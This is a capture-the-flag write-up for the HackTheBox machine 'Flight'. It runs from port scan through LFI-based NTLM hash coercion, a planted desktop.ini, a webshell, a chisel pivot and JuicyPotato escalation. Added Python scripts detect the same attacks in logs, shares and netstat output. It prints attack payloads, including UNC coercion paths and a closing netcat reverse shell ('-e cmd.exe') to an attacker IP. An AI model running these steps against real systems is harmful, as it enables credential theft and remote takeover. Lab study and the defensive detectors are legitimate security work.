HTB Flight

PORT SCAN

# Nmap 7.93 scan initiated Wed Dec 21 02:42:29 2022 as: nmap -p- --min-rate=10000 -sC -sV -oN portscan.txt 10.10.11.187
Nmap scan report for 10.10.11.187
Host is up (0.14s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
| http-methods:
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-12-21 14:43:03Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-12-21T14:43:59
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 21 02:44:38 2022 -- 1 IP address (1 host up) scanned in 128.51 seconds

The domain found is flight.htb.

Content and subdomain enumeration

wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://flight.htb/" -H "Host: FUZZ.flight.htb" --hl 154

000000624:   200        90 L     412 W      3996 Ch     "school"

Subdomain found: school (school.flight.htb).


The view parameter of index.php is vulnerable to LFI.

This lets us read file source code. We can also use it to make the service fetch a remote path written in Windows network-share (UNC) syntax, //<ip>/share, and possibly capture the service account's hash.
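As an added defender-side example (not part of the original writeup), the Python script below scans Apache access-log lines for view= values that are not on an allowlist of legitimate pages and labels UNC-style paths and directory traversal, which is exactly what the request above looks like in the server log. The log lines, the client address 192.0.2.10 and the allowlist are constructed for illustration. The same allowlist is the server-side fix: the include should only ever resolve a name from that set.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache access-log lines (not captured from the box). The client
# address 192.0.2.10 is a documentation address standing in for the attacker host.
SAMPLE_LOG = r"""
192.0.2.10 - - [21/Dec/2022:02:50:01 -0500] "GET /index.php?view=about.html HTTP/1.1" 200 3996
192.0.2.10 - - [21/Dec/2022:02:51:12 -0500] "GET /index.php?view=//192.0.2.10/test HTTP/1.1" 200 154
192.0.2.10 - - [21/Dec/2022:02:51:40 -0500] "GET /index.php?view=..\..\..\windows\win.ini HTTP/1.1" 200 512
192.0.2.10 - - [21/Dec/2022:02:52:03 -0500] "GET /index.php?view=%5C%5C192.0.2.10%5Cshare HTTP/1.1" 200 154
""".strip().splitlines()

# Assumed allowlist of pages the site legitimately includes through `view`.
ALLOWED_VIEWS = frozenset({"index.html", "about.html", "blog.html", "home.html"})

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_view(view: str) -> Optional[str]:
    """Label a `view` value, or return None when it is an allowlisted page.

    Backslashes are normalised to forward slashes first so that the backslash
    and forward-slash UNC forms are treated the same, as Windows does."""
    value = unquote(view)  # catches a second layer of percent-encoding
    if value in ALLOWED_VIEWS:
        return None
    normalised = value.replace("\\", "/")
    if normalised.startswith("//"):
        # A UNC path makes the web server open an SMB session to that host,
        # sending the service account's NTLM authentication with it.
        return "unc-path"
    if "../" in normalised:
        return "traversal"
    return "not-allowlisted"


def scan_access_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, label, decoded view value) for every suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        for view in parse_qs(query).get("view", []):
            label = classify_view(view)
            if label is not None:
                findings.append((number, label, unquote(view)))
    return findings


if __name__ == "__main__":
    for number, label, view in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {label:15} view={view}")
```

Run it over a real access log by replacing SAMPLE_LOG with the file's lines; a UNC hit from an address outside the network, combined with outbound SMB from the web server, is the signal that a service-account hash has left the box. Blocking outbound TCP 445 from the web tier stops the coercion even if the LFI remains.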

Capture service account hash

In browser
**http://school.flight.htb/index.php?view=//<ip>/test**

In bash

sudo responder -I tun0 -wP


We get the flight\svc_apache account hash.
To make use of the hash, we need to crack it by brute force with hashcat.

SMB

From above, we have svc_apache and its password. The next step is to use them to access the SMB service.


The C.Bum user deserves closer attention.

AD ENUM


After AD enumeration we found many users, but only S.Moon has the same password as svc_apache.

Get user shell [C.bum]

If we don’t know which share directory is writable we can use impacket-psexec.

Create a desktop.ini file with the following content. For more detail, refer to
https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds#desktop.ini

[.ShellClassInfo]
IconResource=\\<ip>\test

After uploading this file to the SMB share, we can set up responder again and capture the c.bum hash.
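As an added defender-side example (not part of the original writeup), the Python script below walks a share's directory tree, parses every desktop.ini it finds and reports IconResource or IconFile entries that point at a UNC host outside a trusted set, which is how a planted file like the one above shows up to whoever audits the share. The fixture directory, the host 192.0.2.10 and the trusted host name fileserver.flight.htb are constructed for illustration.

```python
import configparser
import os
import re
import tempfile
from typing import Iterable, List, Optional, Tuple

# Matches \\host\share or //host/share and captures the host part.
UNC_RE = re.compile(r"^[\\/]{2}([^\\/]+)[\\/]")

# desktop.ini keys that Explorer resolves (and authenticates to) when a folder is viewed.
ICON_KEYS = ("iconresource", "iconfile")


def unc_host(value: str) -> Optional[str]:
    """Return the lower-cased host of a UNC path, or None for local values."""
    match = UNC_RE.match(value.strip())
    return match.group(1).lower() if match else None


def scan_share(root: str, trusted_hosts: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Return (path, key, host) for every desktop.ini icon entry that points off-list."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() != "desktop.ini":
                continue
            path = os.path.join(dirpath, name)
            # interpolation=None: values such as %SystemRoot% must not be expanded.
            parser = configparser.ConfigParser(interpolation=None, strict=False)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    parser.read_string(fh.read())
            except configparser.Error:
                findings.append((path, "unparseable", ""))
                continue
            for section in parser.sections():
                for key, value in parser.items(section):
                    if key in ICON_KEYS:
                        host = unc_host(value)
                        if host and host not in trusted:
                            findings.append((path, key, host))
    return findings


def build_sample_share(root: str) -> None:
    """Constructed fixture: one legitimate desktop.ini and one planted one."""
    benign = os.path.join(root, "Users", "Public")
    planted = os.path.join(root, "Shared", "Reports")
    os.makedirs(benign)
    os.makedirs(planted)
    with open(os.path.join(benign, "desktop.ini"), "w") as fh:
        fh.write("[.ShellClassInfo]\nIconResource=%SystemRoot%\\system32\\shell32.dll,3\n")
    with open(os.path.join(planted, "desktop.ini"), "w") as fh:
        fh.write("[.ShellClassInfo]\nIconResource=\\\\192.0.2.10\\test\n")


def run_demo() -> List[Tuple[str, str, str]]:
    """Build the fixture in a temp dir and return findings with share-relative paths."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_share(root)
        # fileserver.flight.htb is an assumed name for an internal host that may
        # legitimately serve icons; anything else is reported.
        hits = scan_share(root, trusted_hosts={"fileserver.flight.htb"})
        return [(os.path.relpath(p, root).replace(os.sep, "/"), key, host)
                for p, key, host in hits]


if __name__ == "__main__":
    for path, key, host in run_demo():
        print(f"{path}: {key} points at untrusted host {host}")
```

Point scan_share at a mounted share to audit it; the finding here would be the planted file alone. The underlying fix is to remove write access for ordinary users on shares that others browse, since any user who can write a desktop.ini can make every visitor's Explorer authenticate to a host of their choosing.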



Upload the webshell to school.flight.htb or flight.htb, then use PowerShell to connect to the machine.

Switch to a c.bum shell using RunasCs.

Get the root shell

netstat -ano


We found port 8000 listening with PID 4. PID 4 is the System process, so this is a kernel-mode listener rather than a user-mode service we can inspect directly.

To examine this internal service further we have to pivot into the intranet.
We use chisel to make the port reachable.
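As an added example (not part of the original writeup), the Python script below parses netstat -ano output and separates out two kinds of listener that matter when reviewing a host like this one: ports bound only to loopback, which an external scan never sees and which here prompted the chisel pivot, and ports owned by PID 4, which belong to the System process and are typically registered with http.sys on behalf of IIS or WinRM. The netstat text is constructed for illustration, with 192.0.2.10 as a documentation address.

```python
from typing import Dict, List

# Constructed `netstat -ano` output (not captured from the box).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       2160
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:8000         0.0.0.0:0              LISTENING       4
  TCP    10.10.11.187:49667     192.0.2.10:49152       ESTABLISHED     3312
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::1]:8000             [::]:0                 LISTENING       4
  UDP    0.0.0.0:53             *:*                                    1976
"""

SYSTEM_PID = 4  # the Windows "System" process; its TCP listeners live in kernel mode
LOOPBACK = {"127.0.0.1", "::1"}


def _split_endpoint(endpoint: str):
    """Split 'host:port' or '[v6]:port' into (host, port); port is None for '*'."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), (int(port) if port.isdigit() else None)


def parse_netstat(text: str) -> List[Dict]:
    """Turn netstat -ano rows into dicts; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local, foreign = parts[0], parts[1], parts[2]
        # UDP rows have no State column, so the PID is always the last field.
        state = parts[3] if proto == "TCP" and len(parts) == 5 else ""
        local_host, local_port = _split_endpoint(local)
        rows.append({"proto": proto, "local_host": local_host, "local_port": local_port,
                     "foreign": foreign, "state": state, "pid": int(parts[-1])})
    return rows


def loopback_listeners(rows: List[Dict]) -> List[Dict]:
    """Listeners reachable only from the host itself (or through a tunnel)."""
    return [r for r in rows if r["state"] == "LISTENING" and r["local_host"] in LOOPBACK]


def kernel_listeners(rows: List[Dict]) -> List[Dict]:
    """Listeners owned by PID 4; tasklist cannot name the real owner of these."""
    return [r for r in rows if r["state"] == "LISTENING" and r["pid"] == SYSTEM_PID]


if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    for r in loopback_listeners(rows):
        print(f"loopback-only: {r['proto']} {r['local_host']}:{r['local_port']} pid={r['pid']}")
    for r in kernel_listeners(rows):
        print(f"PID 4 (System): {r['proto']} {r['local_host']}:{r['local_port']}")
```

For a PID 4 HTTP listener, `netsh http show servicestate` on the host lists the registered URL prefixes together with the user-mode process (an IIS worker, WinRM, and so on) that actually handles them, which is the next step when deciding what a loopback-only port exposes.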

Bash

./chisel server -p 4000 --reverse

Windows PowerShell

Upload the ASPX webshell cmdasp.aspx.

Get the IIS app pool shell

The IIS service account has SeImpersonatePrivilege. This can be exploited using JuicyPotato.

potato.exe -t * -p "C:\users\public\download\nc64.exe" -a "10.10.16.10 9010 -e cmd.exe"